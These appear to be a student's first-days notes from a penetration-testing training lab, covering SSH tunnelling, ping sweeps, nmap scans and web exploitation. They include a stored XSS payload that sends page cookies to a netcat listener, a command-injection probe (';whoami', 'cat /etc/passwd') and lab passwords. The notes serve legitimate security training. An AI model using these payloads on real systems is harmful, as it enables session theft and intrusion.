First day, day one! Let's get this started, I can type with out looking at the keyboard. Oops I missed spelled without, like why is it just one word. 
Linux op station: 10.50.179.44
Getting on to
ssh demo1@10.50.15.172 -L 1111:10.208.50.61:80 for Challenges???
                                        .42   
127.0.0.1:1111/classinfo.html

BRGA-021-M   Stack# 7  PW:TEBcv54D4iPn   Jump:10.50.16.164
Challenges 10.50.178.176:8000

mol PW:WhyrightNow

favriout site for vulnerabilites: exploit-db, google the CVE # with github.



                                                                                        OP NOTES

##Control Sockets
  ssh -MS /tmp/jump student@10.50.16.164        (M is multiplexing, to connect to multiple systems, S is socket created in /tmp directory)

##ping sweep from jump box
  for i in {97..126}; do (ping -c 1 192.168.28.$i | grep "bytes from" &); done       from jump box we can only pingsweep
                                                                                                                                                          .97, .100, .105, .111, .120
##Create Dynamic port forward
  ssh -S /tmp/jump jump -O forward -D9050
  (Later:  ssh -S /tmp/jump jump -O cancle -D9050)
  nmap
                                                                                                                                                          Nmap scan report for 192.168.28.100            
                                                                                                                                                          80/tcp   open  http GOOD
                                                                                                                                                          2222/tcp open  EtherNetIP-1 SSH
                                                                                                                                                          
                                                                                                                                                          Nmap scan report for 192.168.28.105
                                                                                                                                                          21/tcp   open  ftp GOOD
                                                                                                                                                          23/tcp   open  telnet GOOD
                                                                                                                                                          2222/tcp open  EtherNetIP-1 SSH
                                                                                                                                                          
                                                                                                                                                          Nmap scan report for 192.168.28.111
                                                                                                                                                          80/tcp   open  http GOOD
                                                                                                                                                          2222/tcp open  EtherNetI P-1 SSH
                                                                                                                                                          8080/tcp open  http-proxy HTTP
                                                                                                                                              
                                                                                                                                                          Nmap scan report for 192.168.28.120
                                                                                                                                                          4242/tcp open  vrml-multi-use SSH


##Verify ports
  proxychains nc 192.168.28.100 80

##set up port forwarding 
  ssh -S /tmp/jump jump -O forward -L 1111:192.168.28.100:80 -L 1112:192.168.28.100:2222 -L 2111:192.168.28.105:2222                

## To delete one local port forward
  ssh -S /tmp/jump jump -O cancle -L 2111:192.168.28.105:2222

##Navigate to webserver on Firefox
  127.0.0.1:1111

## Authenticate to new system
  ssh -MS /tmp/t1 username@127.0.0.1 -p 1112
  man

## Find directeries to navigate to with this scan    /usr/share/nmap/scripts                            nmap --script <filename>|<category>|<directory>
                                                                                                        nmap --script-help "ftp-* and discovery"
                                                                                                        nmap --script-args <args>
                                                                                                        nmap --script-args-file <filename>
                                                                                                        nmap --script-help <filename>|<category>|<directory>
                                                                                                        nmap --script-trace
  proxychains nmap --script=http-enum 192.168.28.100

**************************************************************************************************************************************************************************************************************************
                                                                                            
                                                                                          DAY 2 Web exploitation

GET requests can be ultlized to pass data to the server with this:         http://10.50.x.x/path/pathdemo.php?myfile=demo1           Where does this go? in the site bar on top


                                                                                            OP NOTES
ssh demo1@10.50.15.172 -L 9999:10.208.50.42:80

stored XXS, open a listning port nc -lvnk 4444
on site:
<script>document.location="http://10.50.179.44:4444/?username=" + document.cookie;</script>      capture cookies
                                                                  document.body.innerHTML          capture sensitive data

using the script http-enum, we find files of interest to navigate to on the http search bar

ssh-keygen -t rsa -b 4096     to generate you own keys in an .ssh file

In order to Malicoius file upload we need
  1. ability to upload to a server
  2. know where we are uploading to
  3. be able to get there to run commands on shell created

                                                                                      
                                                              Sinerio  
Type of Operation: Cyber Intelligence, Surveillance and Reconnaissance (C-ISR)
Objective: Maneuver through network, identify and gain access to Minstry of Industry web servers.
Tools/Techniques: All connections will be established through SSH masquerades or web browser. Ports in use will be dependent on target location and are subject to change. Web exploitation techniques limited to 
cross-site scripting, command injection, file upload, and path transversal. Network scanning tools/technique usage is at the discretion of student.
Scenario Credentials: FLAG = W3B3xpl01t5t@rt0F@ct1v1ty
Prior Approvals: Development of SSH access on host: Donovian_MI_websvr. Upon identification of additional Minstry web sites, student is authorized browse to pages to collect intellegence to enable answering CTFd challenges.

Scheme of Maneuver:
>Jump Box
->T1:10.100.28.40

Target Section:

T1
Hostname: Donovian_MI_websvr
IP: 10.100.28.40
OS: unknown
Creds:unknown
Last Known SSH Port: unknown
PSP: Unknown
Malware: Unknown
Action: Conduct approved Web Exploitation techniques to collect intellegence.

                                                OP notes
>ssh -MS /tmp/jump student@10.50.16.164
>ssh -S /tmp/jump jump -O forward -D9050
>proxychains nmap -sT -T4 10.100.28.40                80/tcp   open  http    Good
                                                      4444/tcp open  krb524  SSH
>nc the ports
>ssh -S /tmp/jump jump -O forward -L 1111:10.100.28.40:80 -L 1112:10.100.28.40:4444
>proxychains nmap --script=http-enum 192.168.28.100
/robots.txt ## net_test   then a page with bars to send pings to             >>> >>> >>> >>> >>> >>> >>> Path to test ;whoami then>> cat /etc/passwd (can access linux thru here)
/css/       ## pictues of differrent sizes, and 2 files full of characters 
/images/    ## russian images
/uploads/   ##this is the cyber swareness training and the location of its ip







